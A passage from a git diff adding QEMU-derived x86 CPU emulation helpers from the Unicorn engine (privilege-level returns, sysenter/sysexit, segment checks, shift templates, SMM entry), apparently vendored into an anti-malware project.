sp, sp_mask, env->regs[R_ESP]); + for (i = param_count - 1; i >= 0; i--) { + val = cpu_lduw_kernel(env, old_ssp + + ((env->regs[R_ESP] + i * 2) & + old_sp_mask)); + PUSHW(ssp, sp, sp_mask, val); + } + } + new_stack = 1; + } else { + /* to same privilege */ + sp = env->regs[R_ESP]; + sp_mask = get_sp_mask(env->segs[R_SS].flags); + ssp = env->segs[R_SS].base; + /* push_size = (4 << shift); */ + new_stack = 0; + } + + if (shift) { + PUSHL(ssp, sp, sp_mask, env->segs[R_CS].selector); + PUSHL(ssp, sp, sp_mask, next_eip); + } else { + PUSHW(ssp, sp, sp_mask, env->segs[R_CS].selector); + PUSHW(ssp, sp, sp_mask, next_eip); + } + + /* from this point, not restartable */ + + if (new_stack) { + ss = (ss & ~3) | dpl; + cpu_x86_load_seg_cache(env, R_SS, ss, + ssp, + get_seg_limit(ss_e1, ss_e2), + ss_e2); + } + + selector = (selector & ~3) | dpl; + cpu_x86_load_seg_cache(env, R_CS, selector, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), + e2); + SET_ESP(sp, sp_mask); + env->eip = offset; + } +} + +/* real and vm86 mode iret */ +void helper_iret_real(CPUX86State *env, int shift) +{ + uint32_t sp, new_cs, new_eip, new_eflags, sp_mask; + target_ulong ssp; + int eflags_mask; + + sp_mask = 0xffff; /* XXXX: use SS segment size? */ + sp = env->regs[R_ESP]; + ssp = env->segs[R_SS].base; + if (shift == 1) { + /* 32 bits */ + POPL(ssp, sp, sp_mask, new_eip); + POPL(ssp, sp, sp_mask, new_cs); + new_cs &= 0xffff; + POPL(ssp, sp, sp_mask, new_eflags); + } else { + /* 16 bits */ + POPW(ssp, sp, sp_mask, new_eip); + POPW(ssp, sp, sp_mask, new_cs); + POPW(ssp, sp, sp_mask, new_eflags); + } + env->regs[R_ESP] = (env->regs[R_ESP] & ~sp_mask) | (sp & sp_mask); + env->segs[R_CS].selector = new_cs; + env->segs[R_CS].base = (new_cs << 4); + env->eip = new_eip; + if (env->eflags & VM_MASK) { + eflags_mask = TF_MASK | AC_MASK | ID_MASK | IF_MASK | RF_MASK | + NT_MASK; + } else { + eflags_mask = TF_MASK | AC_MASK | ID_MASK | IF_MASK | IOPL_MASK | + RF_MASK | NT_MASK; + } + if (shift == 0) { + eflags_mask &= 0xffff; + } + cpu_load_eflags(env, new_eflags, eflags_mask); + env->hflags2 &= ~HF2_NMI_MASK; +} + +static inline void validate_seg(CPUX86State *env, int seg_reg, int cpl) +{ + int dpl; + uint32_t e2; + + /* XXX: on x86_64, we do not want to nullify FS and GS because + they may still contain a valid base. I would be interested to + know how a real x86_64 CPU behaves */ + if ((seg_reg == R_FS || seg_reg == R_GS) && + (env->segs[seg_reg].selector & 0xfffc) == 0) { + return; + } + + e2 = env->segs[seg_reg].flags; + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (!(e2 & DESC_CS_MASK) || !(e2 & DESC_C_MASK)) { + /* data or non conforming code segment */ + if (dpl < cpl) { + cpu_x86_load_seg_cache(env, seg_reg, 0, 0, 0, 0); + } + } +} + +/* protected mode iret */ +static inline void helper_ret_protected(CPUX86State *env, int shift, + int is_iret, int addend) +{ + uint32_t new_cs, new_eflags, new_ss; + uint32_t new_es, new_ds, new_fs, new_gs; + uint32_t e1, e2, ss_e1, ss_e2; + int cpl, dpl, rpl, eflags_mask, iopl; + target_ulong ssp, sp, new_eip, new_esp, sp_mask; + +#ifdef TARGET_X86_64 + if (shift == 2) { + sp_mask = -1; + } else +#endif + { + sp_mask = get_sp_mask(env->segs[R_SS].flags); + } + sp = env->regs[R_ESP]; + ssp = env->segs[R_SS].base; + new_eflags = 0; /* avoid warning */ +#ifdef TARGET_X86_64 + if (shift == 2) { + POPQ(sp, new_eip); + POPQ(sp, new_cs); + new_cs &= 0xffff; + if (is_iret) { + POPQ(sp, new_eflags); + } + } else +#endif + { + if (shift == 1) { + /* 32 bits */ + POPL(ssp, sp, sp_mask, new_eip); + POPL(ssp, sp, sp_mask, new_cs); + new_cs &= 0xffff; + if (is_iret) { + POPL(ssp, sp, sp_mask, new_eflags); + if (new_eflags & VM_MASK) { + goto return_to_vm86; + } + } + } else { + /* 16 bits */ + POPW(ssp, sp, sp_mask, new_eip); + POPW(ssp, sp, sp_mask, new_cs); + if (is_iret) { + POPW(ssp, sp, sp_mask, new_eflags); + } + } + } + LOG_PCALL("lret new %04x:" TARGET_FMT_lx " s=%d addend=0x%x\n", + new_cs, new_eip, shift, addend); + LOG_PCALL_STATE(CPU(x86_env_get_cpu(env))); + if ((new_cs & 0xfffc) == 0) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + if (load_segment(env, &e1, &e2, new_cs) != 0) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + if (!(e2 & DESC_S_MASK) || + !(e2 & DESC_CS_MASK)) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + cpl = env->hflags & HF_CPL_MASK; + rpl = new_cs & 3; + if (rpl < cpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (e2 & DESC_C_MASK) { + if (dpl > rpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + } else { + if (dpl != rpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, new_cs & 0xfffc); + } + + sp += addend; + if (rpl == cpl && (!(env->hflags & HF_CS64_MASK) || + ((env->hflags & HF_CS64_MASK) && !is_iret))) { + /* return to same privilege level */ + cpu_x86_load_seg_cache(env, R_CS, new_cs, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), + e2); + } else { + /* return to different privilege level */ +#ifdef TARGET_X86_64 + if (shift == 2) { + POPQ(sp, new_esp); + POPQ(sp, new_ss); + new_ss &= 0xffff; + } else +#endif + { + if (shift == 1) { + /* 32 bits */ + POPL(ssp, sp, sp_mask, new_esp); + POPL(ssp, sp, sp_mask, new_ss); + new_ss &= 0xffff; + } else { + /* 16 bits */ + POPW(ssp, sp, sp_mask, new_esp); + POPW(ssp, sp, sp_mask, new_ss); + } + } + LOG_PCALL("new ss:esp=%04x:" TARGET_FMT_lx "\n", + new_ss, new_esp); + if ((new_ss & 0xfffc) == 0) { +#ifdef TARGET_X86_64 + /* NULL ss is allowed in long mode if cpl != 3 */ + /* XXX: test CS64? */ + if ((env->hflags & HF_LMA_MASK) && rpl != 3) { + cpu_x86_load_seg_cache(env, R_SS, new_ss, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | (rpl << DESC_DPL_SHIFT) | + DESC_W_MASK | DESC_A_MASK); + ss_e2 = DESC_B_MASK; /* XXX: should not be needed? */ + } else +#endif + { + raise_exception_err(env, EXCP0D_GPF, 0); + } + } else { + if ((new_ss & 3) != rpl) { + raise_exception_err(env, EXCP0D_GPF, new_ss & 0xfffc); + } + if (load_segment(env, &ss_e1, &ss_e2, new_ss) != 0) { + raise_exception_err(env, EXCP0D_GPF, new_ss & 0xfffc); + } + if (!(ss_e2 & DESC_S_MASK) || + (ss_e2 & DESC_CS_MASK) || + !(ss_e2 & DESC_W_MASK)) { + raise_exception_err(env, EXCP0D_GPF, new_ss & 0xfffc); + } + dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3; + if (dpl != rpl) { + raise_exception_err(env, EXCP0D_GPF, new_ss & 0xfffc); + } + if (!(ss_e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, new_ss & 0xfffc); + } + cpu_x86_load_seg_cache(env, R_SS, new_ss, + get_seg_base(ss_e1, ss_e2), + get_seg_limit(ss_e1, ss_e2), + ss_e2); + } + + cpu_x86_load_seg_cache(env, R_CS, new_cs, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), + e2); + sp = new_esp; +#ifdef TARGET_X86_64 + if (env->hflags & HF_CS64_MASK) { + sp_mask = -1; + } else +#endif + { + sp_mask = get_sp_mask(ss_e2); + } + + /* validate data segments */ + validate_seg(env, R_ES, rpl); + validate_seg(env, R_DS, rpl); + validate_seg(env, R_FS, rpl); + validate_seg(env, R_GS, rpl); + + sp += addend; + } + SET_ESP(sp, sp_mask); + env->eip = new_eip; + if (is_iret) { + /* NOTE: 'cpl' is the _old_ CPL */ + eflags_mask = TF_MASK | AC_MASK | ID_MASK | RF_MASK | NT_MASK; + if (cpl == 0) { + eflags_mask |= IOPL_MASK; + } + iopl = (env->eflags >> IOPL_SHIFT) & 3; + if (cpl <= iopl) { + eflags_mask |= IF_MASK; + } + if (shift == 0) { + eflags_mask &= 0xffff; + } + cpu_load_eflags(env, new_eflags, eflags_mask); + } + return; + + return_to_vm86: + POPL(ssp, sp, sp_mask, new_esp); + POPL(ssp, sp, sp_mask, new_ss); + POPL(ssp, sp, sp_mask, new_es); + POPL(ssp, sp, sp_mask, new_ds); + POPL(ssp, sp, sp_mask, new_fs); + POPL(ssp, sp, sp_mask, new_gs); + + /* modify processor state */ + cpu_load_eflags(env, new_eflags, TF_MASK | AC_MASK | ID_MASK | + IF_MASK | IOPL_MASK | VM_MASK | NT_MASK | VIF_MASK | + VIP_MASK); + load_seg_vm(env, R_CS, new_cs & 0xffff); + load_seg_vm(env, R_SS, new_ss & 0xffff); + load_seg_vm(env, R_ES, new_es & 0xffff); + load_seg_vm(env, R_DS, new_ds & 0xffff); + load_seg_vm(env, R_FS, new_fs & 0xffff); + load_seg_vm(env, R_GS, new_gs & 0xffff); + + env->eip = new_eip & 0xffff; + env->regs[R_ESP] = new_esp; +} + +void helper_iret_protected(CPUX86State *env, int shift, int next_eip) +{ + int tss_selector, type; + uint32_t e1, e2; + + /* specific case for TSS */ + if (env->eflags & NT_MASK) { +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + raise_exception_err(env, EXCP0D_GPF, 0); + } +#endif + tss_selector = cpu_lduw_kernel(env, env->tr.base + 0); + if (tss_selector & 4) { + raise_exception_err(env, EXCP0A_TSS, tss_selector & 0xfffc); + } + if (load_segment(env, &e1, &e2, tss_selector) != 0) { + raise_exception_err(env, EXCP0A_TSS, tss_selector & 0xfffc); + } + type = (e2 >> DESC_TYPE_SHIFT) & 0x17; + /* NOTE: we check both segment and busy TSS */ + if (type != 3) { + raise_exception_err(env, EXCP0A_TSS, tss_selector & 0xfffc); + } + switch_tss(env, tss_selector, e1, e2, SWITCH_TSS_IRET, next_eip); + } else { + helper_ret_protected(env, shift, 1, 0); + } + env->hflags2 &= ~HF2_NMI_MASK; +} + +void helper_lret_protected(CPUX86State *env, int shift, int addend) +{ + helper_ret_protected(env, shift, 0, addend); +} + +void helper_sysenter(CPUX86State *env, int next_eip_addend) +{ + // Unicorn: call registered SYSENTER hooks + struct hook *hook; + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(env->uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, env->eip)) + continue; + if (hook->insn == UC_X86_INS_SYSENTER) + ((uc_cb_insn_syscall_t)hook->callback)(env->uc, hook->user_data); + } + + env->eip += next_eip_addend; + return; + + if (env->sysenter_cs == 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + env->eflags &= ~(VM_MASK | IF_MASK | RF_MASK); + +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + cpu_x86_load_seg_cache(env, R_CS, env->sysenter_cs & 0xfffc, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | + DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK | + DESC_L_MASK); + } else +#endif + { + cpu_x86_load_seg_cache(env, R_CS, env->sysenter_cs & 0xfffc, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | + DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); + } + cpu_x86_load_seg_cache(env, R_SS, (env->sysenter_cs + 8) & 0xfffc, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | + DESC_W_MASK | DESC_A_MASK); + env->regs[R_ESP] = env->sysenter_esp; + env->eip = env->sysenter_eip; +} + +void helper_sysexit(CPUX86State *env, int dflag) +{ + int cpl; + + cpl = env->hflags & HF_CPL_MASK; + if (env->sysenter_cs == 0 || cpl != 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } +#ifdef TARGET_X86_64 + if (dflag == 2) { + cpu_x86_load_seg_cache(env, R_CS, ((env->sysenter_cs + 32) & 0xfffc) | + 3, 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | (3 << DESC_DPL_SHIFT) | + DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK | + DESC_L_MASK); + cpu_x86_load_seg_cache(env, R_SS, ((env->sysenter_cs + 40) & 0xfffc) | + 3, 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | (3 << DESC_DPL_SHIFT) | + DESC_W_MASK | DESC_A_MASK); + } else +#endif + { + cpu_x86_load_seg_cache(env, R_CS, ((env->sysenter_cs + 16) & 0xfffc) | + 3, 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | (3 << DESC_DPL_SHIFT) | + DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_SS, ((env->sysenter_cs + 24) & 0xfffc) | + 3, 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | (3 << DESC_DPL_SHIFT) | + DESC_W_MASK | DESC_A_MASK); + } + env->regs[R_ESP] = env->regs[R_ECX]; + env->eip = env->regs[R_EDX]; +} + +target_ulong helper_lsl(CPUX86State *env, target_ulong selector1) +{ + unsigned int limit; + uint32_t e1, e2, eflags, selector; + int rpl, dpl, cpl, type; + + selector = selector1 & 0xffff; + eflags = cpu_cc_compute_all(env, CC_OP); + if ((selector & 0xfffc) == 0) { + goto fail; + } + if (load_segment(env, &e1, &e2, selector) != 0) { + goto fail; + } + rpl = selector & 3; + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + cpl = env->hflags & HF_CPL_MASK; + if (e2 & DESC_S_MASK) { + if ((e2 & DESC_CS_MASK) && (e2 & DESC_C_MASK)) { + /* conforming */ + } else { + if (dpl < cpl || dpl < rpl) { + goto fail; + } + } + } else { + type = (e2 >> DESC_TYPE_SHIFT) & 0xf; + switch (type) { + case 1: + case 2: + case 3: + case 9: + case 11: + break; + default: + goto fail; + } + if (dpl < cpl || dpl < rpl) { + fail: + CC_SRC = eflags & ~CC_Z; + return 0; + } + } + limit = get_seg_limit(e1, e2); + CC_SRC = eflags | CC_Z; + return limit; +} + +target_ulong helper_lar(CPUX86State *env, target_ulong selector1) +{ + uint32_t e1, e2, eflags, selector; + int rpl, dpl, cpl, type; + + selector = selector1 & 0xffff; + eflags = cpu_cc_compute_all(env, CC_OP); + if ((selector & 0xfffc) == 0) { + goto fail; + } + if (load_segment(env, &e1, &e2, selector) != 0) { + goto fail; + } + rpl = selector & 3; + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + cpl = env->hflags & HF_CPL_MASK; + if (e2 & DESC_S_MASK) { + if ((e2 & DESC_CS_MASK) && (e2 & DESC_C_MASK)) { + /* conforming */ + } else { + if (dpl < cpl || dpl < rpl) { + goto fail; + } + } + } else { + type = (e2 >> DESC_TYPE_SHIFT) & 0xf; + switch (type) { + case 1: + case 2: + case 3: + case 4: + case 5: + case 9: + case 11: + case 12: + break; + default: + goto fail; + } + if (dpl < cpl || dpl < rpl) { + fail: + CC_SRC = eflags & ~CC_Z; + return 0; + } + } + CC_SRC = eflags | CC_Z; + return e2 & 0x00f0ff00; +} + +void helper_verr(CPUX86State *env, target_ulong selector1) +{ + uint32_t e1, e2, eflags, selector; + int rpl, dpl, cpl; + + selector = selector1 & 0xffff; + eflags = cpu_cc_compute_all(env, CC_OP); + if ((selector & 0xfffc) == 0) { + goto fail; + } + if (load_segment(env, &e1, &e2, selector) != 0) { + goto fail; + } + if (!(e2 & DESC_S_MASK)) { + goto fail; + } + rpl = selector & 3; + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + cpl = env->hflags & HF_CPL_MASK; + if (e2 & DESC_CS_MASK) { + if (!(e2 & DESC_R_MASK)) { + goto fail; + } + if (!(e2 & DESC_C_MASK)) { + if (dpl < cpl || dpl < rpl) { + goto fail; + } + } + } else { + if (dpl < cpl || dpl < rpl) { + fail: + CC_SRC = eflags & ~CC_Z; + return; + } + } + CC_SRC = eflags | CC_Z; +} + +void helper_verw(CPUX86State *env, target_ulong selector1) +{ + uint32_t e1, e2, eflags, selector; + int rpl, dpl, cpl; + + selector = selector1 & 0xffff; + eflags = cpu_cc_compute_all(env, CC_OP); + if ((selector & 0xfffc) == 0) { + goto fail; + } + if (load_segment(env, &e1, &e2, selector) != 0) { + goto fail; + } + if (!(e2 & DESC_S_MASK)) { + goto fail; + } + rpl = selector & 3; + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + cpl = env->hflags & HF_CPL_MASK; + if (e2 & DESC_CS_MASK) { + goto fail; + } else { + if (dpl < cpl || dpl < rpl) { + goto fail; + } + if (!(e2 & DESC_W_MASK)) { + fail: + CC_SRC = eflags & ~CC_Z; + return; + } + } + CC_SRC = eflags | CC_Z; +} + +void cpu_x86_load_seg(CPUX86State *env, int seg_reg, int selector) +{ + if (!(env->cr[0] & CR0_PE_MASK) || (env->eflags & VM_MASK)) { + int dpl = (env->eflags & VM_MASK) ? 3 : 0; + selector &= 0xffff; + cpu_x86_load_seg_cache(env, seg_reg, selector, + (selector << 4), 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK | (dpl << DESC_DPL_SHIFT)); + } else { + helper_load_seg(env, seg_reg, selector); + } +} + +/* check if Port I/O is allowed in TSS */ +static inline void check_io(CPUX86State *env, int addr, int size) +{ + int io_offset, val, mask; + + /* TSS must be a valid 32 bit one */ + if (!(env->tr.flags & DESC_P_MASK) || + ((env->tr.flags >> DESC_TYPE_SHIFT) & 0xf) != 9 || + env->tr.limit < 103) { + goto fail; + } + io_offset = cpu_lduw_kernel(env, env->tr.base + 0x66); + io_offset += (addr >> 3); + /* Note: the check needs two bytes */ + if ((io_offset + 1) > env->tr.limit) { + goto fail; + } + val = cpu_lduw_kernel(env, env->tr.base + io_offset); + val >>= (addr & 7); + mask = (1 << size) - 1; + /* all bits must be zero to allow the I/O */ + if ((val & mask) != 0) { + fail: + raise_exception_err(env, EXCP0D_GPF, 0); + } +} + +void helper_check_iob(CPUX86State *env, uint32_t t0) +{ + check_io(env, t0, 1); +} + +void helper_check_iow(CPUX86State *env, uint32_t t0) +{ + check_io(env, t0, 2); +} + +void helper_check_iol(CPUX86State *env, uint32_t t0) +{ + check_io(env, t0, 4); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/shift_helper_template.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/shift_helper_template.h new file mode 100644 index 0000000..9e646d7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/shift_helper_template.h @@ -0,0 +1,108 @@ +/* + * x86 shift helpers + * + * Copyright (c) 2008 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#define DATA_BITS (1 << (3 + SHIFT)) +#define SHIFT_MASK (DATA_BITS - 1) +#if DATA_BITS <= 32 +#define SHIFT1_MASK 0x1f +#else +#define SHIFT1_MASK 0x3f +#endif + +#if DATA_BITS == 8 +#define SUFFIX b +#define DATA_MASK 0xff +#elif DATA_BITS == 16 +#define SUFFIX w +#define DATA_MASK 0xffff +#elif DATA_BITS == 32 +#define SUFFIX l +#define DATA_MASK 0xffffffff +#elif DATA_BITS == 64 +#define SUFFIX q +#define DATA_MASK 0xffffffffffffffffULL +#else +#error unhandled operand size +#endif + +target_ulong glue(helper_rcl, SUFFIX)(CPUX86State *env, target_ulong t0, + target_ulong t1) +{ + int count, eflags; + target_ulong src; + target_long res; + + count = t1 & SHIFT1_MASK; +#if DATA_BITS == 16 + count = rclw_table[count]; +#elif DATA_BITS == 8 + count = rclb_table[count]; +#endif + if (count) { + eflags = (int)env->cc_src; + t0 &= DATA_MASK; + src = t0; + res = (t0 << count) | ((target_ulong)(eflags & CC_C) << (count - 1)); + if (count > 1) { + res |= t0 >> (DATA_BITS + 1 - count); + } + t0 = res; + env->cc_src = (eflags & ~(CC_C | CC_O)) | + (lshift(src ^ t0, 11 - (DATA_BITS - 1)) & CC_O) | + ((src >> (DATA_BITS - count)) & CC_C); + } + return t0; +} + +target_ulong glue(helper_rcr, SUFFIX)(CPUX86State *env, target_ulong t0, + target_ulong t1) +{ + int count, eflags; + target_ulong src; + target_long res; + + count = t1 & SHIFT1_MASK; +#if DATA_BITS == 16 + count = rclw_table[count]; +#elif DATA_BITS == 8 + count = rclb_table[count]; +#endif + if (count) { + eflags = (int)env->cc_src; + t0 &= DATA_MASK; + src = t0; + res = (t0 >> count) | + ((target_ulong)(eflags & CC_C) << (DATA_BITS - count)); + if (count > 1) { + res |= t0 << (DATA_BITS + 1 - count); + } + t0 = res; + env->cc_src = (eflags & ~(CC_C | CC_O)) | + (lshift(src ^ t0, 11 - (DATA_BITS - 1)) & CC_O) | + ((src >> (count - 1)) & CC_C); + } + return t0; +} + +#undef DATA_BITS +#undef SHIFT_MASK +#undef SHIFT1_MASK +#undef DATA_TYPE +#undef DATA_MASK +#undef SUFFIX diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/smm_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/smm_helper.c new file mode 100644 index 0000000..7875ff0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/smm_helper.c @@ -0,0 +1,317 @@ +/* + * x86 SMM helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" + +/* SMM support */ + +#if defined(CONFIG_USER_ONLY) + +void do_smm_enter(X86CPU *cpu) +{ +} + +void helper_rsm(CPUX86State *env) +{ +} + +#else + +#ifdef TARGET_X86_64 +#define SMM_REVISION_ID 0x00020064 +#else +#define SMM_REVISION_ID 0x00020000 +#endif + +void do_smm_enter(X86CPU *cpu) +{ + CPUX86State *env = &cpu->env; + CPUState *cs = CPU(cpu); + target_ulong sm_state; + SegmentCache *dt; + int i, offset; + + qemu_log_mask(CPU_LOG_INT, "SMM: enter\n"); + log_cpu_state_mask(CPU_LOG_INT, CPU(cpu), CPU_DUMP_CCOP); + + env->hflags |= HF_SMM_MASK; + cpu_smm_update(env); + + sm_state = env->smbase + 0x8000; + +#ifdef TARGET_X86_64 + for (i = 0; i < 6; i++) { + dt = &env->segs[i]; + offset = 0x7e00 + i * 16; + stw_phys(cs->as, sm_state + offset, dt->selector); + stw_phys(cs->as, sm_state + offset + 2, (dt->flags >> 8) & 0xf0ff); + stl_phys(cs->as, sm_state + offset + 4, dt->limit); + stq_phys(cs->as, sm_state + offset + 8, dt->base); + } + + stq_phys(cs->as, sm_state + 0x7e68, env->gdt.base); + stl_phys(cs->as, sm_state + 0x7e64, env->gdt.limit); + + stw_phys(cs->as, sm_state + 0x7e70, env->ldt.selector); + stq_phys(cs->as, sm_state + 0x7e78, env->ldt.base); + stl_phys(cs->as, sm_state + 0x7e74, env->ldt.limit); + stw_phys(cs->as, sm_state + 0x7e72, (env->ldt.flags >> 8) & 0xf0ff); + + stq_phys(cs->as, sm_state + 0x7e88, env->idt.base); + stl_phys(cs->as, sm_state + 0x7e84, env->idt.limit); + + stw_phys(cs->as, sm_state + 0x7e90, env->tr.selector); + stq_phys(cs->as, sm_state + 0x7e98, env->tr.base); + stl_phys(cs->as, sm_state + 0x7e94, env->tr.limit); + stw_phys(cs->as, sm_state + 0x7e92, (env->tr.flags >> 8) & 0xf0ff); + + stq_phys(cs->as, sm_state + 0x7ed0, env->efer); + + stq_phys(cs->as, sm_state + 0x7ff8, env->regs[R_EAX]); + stq_phys(cs->as, sm_state + 0x7ff0, env->regs[R_ECX]); + stq_phys(cs->as, sm_state + 0x7fe8, env->regs[R_EDX]); + stq_phys(cs->as, sm_state + 0x7fe0, env->regs[R_EBX]); + stq_phys(cs->as, sm_state + 0x7fd8, env->regs[R_ESP]); + stq_phys(cs->as, sm_state + 0x7fd0, env->regs[R_EBP]); + stq_phys(cs->as, sm_state + 0x7fc8, env->regs[R_ESI]); + stq_phys(cs->as, sm_state + 0x7fc0, env->regs[R_EDI]); + for (i = 8; i < 16; i++) { + stq_phys(cs->as, sm_state + 0x7ff8 - i * 8, env->regs[i]); + } + stq_phys(cs->as, sm_state + 0x7f78, env->eip); + stl_phys(cs->as, sm_state + 0x7f70, cpu_compute_eflags(env)); + stl_phys(cs->as, sm_state + 0x7f68, (uint32_t)env->dr[6]); + stl_phys(cs->as, sm_state + 0x7f60, (uint32_t)env->dr[7]); + + stl_phys(cs->as, sm_state + 0x7f48, (uint32_t)env->cr[4]); + stl_phys(cs->as, sm_state + 0x7f50, (uint32_t)env->cr[3]); + stl_phys(cs->as, sm_state + 0x7f58, (uint32_t)env->cr[0]); + + stl_phys(cs->as, sm_state + 0x7efc, SMM_REVISION_ID); + stl_phys(cs->as, sm_state + 0x7f00, env->smbase); +#else + stl_phys(cs->as, sm_state + 0x7ffc, env->cr[0]); + stl_phys(cs->as, sm_state + 0x7ff8, env->cr[3]); + stl_phys(cs->as, sm_state + 0x7ff4, cpu_compute_eflags(env)); + stl_phys(cs->as, sm_state + 0x7ff0, env->eip); + stl_phys(cs->as, sm_state + 0x7fec, env->regs[R_EDI]); + stl_phys(cs->as, sm_state + 0x7fe8, env->regs[R_ESI]); + stl_phys(cs->as, sm_state + 0x7fe4, env->regs[R_EBP]); + stl_phys(cs->as, sm_state + 0x7fe0, env->regs[R_ESP]); + stl_phys(cs->as, sm_state + 0x7fdc, env->regs[R_EBX]); + stl_phys(cs->as, sm_state + 0x7fd8, env->regs[R_EDX]); + stl_phys(cs->as, sm_state + 0x7fd4, env->regs[R_ECX]); + stl_phys(cs->as, sm_state + 0x7fd0, env->regs[R_EAX]); + stl_phys(cs->as, sm_state + 0x7fcc, env->dr[6]); + stl_phys(cs->as, sm_state + 0x7fc8, env->dr[7]); + + stl_phys(cs->as, sm_state + 0x7fc4, env->tr.selector); + stl_phys(cs->as, sm_state + 0x7f64, env->tr.base); + stl_phys(cs->as, sm_state + 0x7f60, env->tr.limit); + stl_phys(cs->as, sm_state + 0x7f5c, (env->tr.flags >> 8) & 0xf0ff); + + stl_phys(cs->as, sm_state + 0x7fc0, env->ldt.selector); + stl_phys(cs->as, sm_state + 0x7f80, env->ldt.base); + stl_phys(cs->as, sm_state + 0x7f7c, env->ldt.limit); + stl_phys(cs->as, sm_state + 0x7f78, (env->ldt.flags >> 8) & 0xf0ff); + + stl_phys(cs->as, sm_state + 0x7f74, env->gdt.base); + stl_phys(cs->as, sm_state + 0x7f70, env->gdt.limit); + + stl_phys(cs->as, sm_state + 0x7f58, env->idt.base); + stl_phys(cs->as, sm_state + 0x7f54, env->idt.limit); + + for (i = 0; i < 6; i++) { + dt = &env->segs[i]; + if (i < 3) { + offset = 0x7f84 + i * 12; + } else { + offset = 0x7f2c + (i - 3) * 12; + } + stl_phys(cs->as, sm_state + 0x7fa8 + i * 4, dt->selector); + stl_phys(cs->as, sm_state + offset + 8, dt->base); + stl_phys(cs->as, sm_state + offset + 4, dt->limit); + stl_phys(cs->as, sm_state + offset, (dt->flags >> 8) & 0xf0ff); + } + stl_phys(cs->as, sm_state + 0x7f14, env->cr[4]); + + stl_phys(cs->as, sm_state + 0x7efc, SMM_REVISION_ID); + stl_phys(cs->as, sm_state + 0x7ef8, env->smbase); +#endif + /* init SMM cpu state */ + +#ifdef TARGET_X86_64 + cpu_load_efer(env, 0); +#endif + cpu_load_eflags(env, 0, ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | + DF_MASK)); + env->eip = 0x00008000; + cpu_x86_update_cr0(env, + env->cr[0] & ~(CR0_PE_MASK | CR0_EM_MASK | CR0_TS_MASK | + CR0_PG_MASK)); + cpu_x86_update_cr4(env, 0); + env->dr[7] = 0x00000400; + + cpu_x86_load_seg_cache(env, R_CS, (env->smbase >> 4) & 0xffff, env->smbase, + 0xffffffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_DS, 0, 0, 0xffffffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + 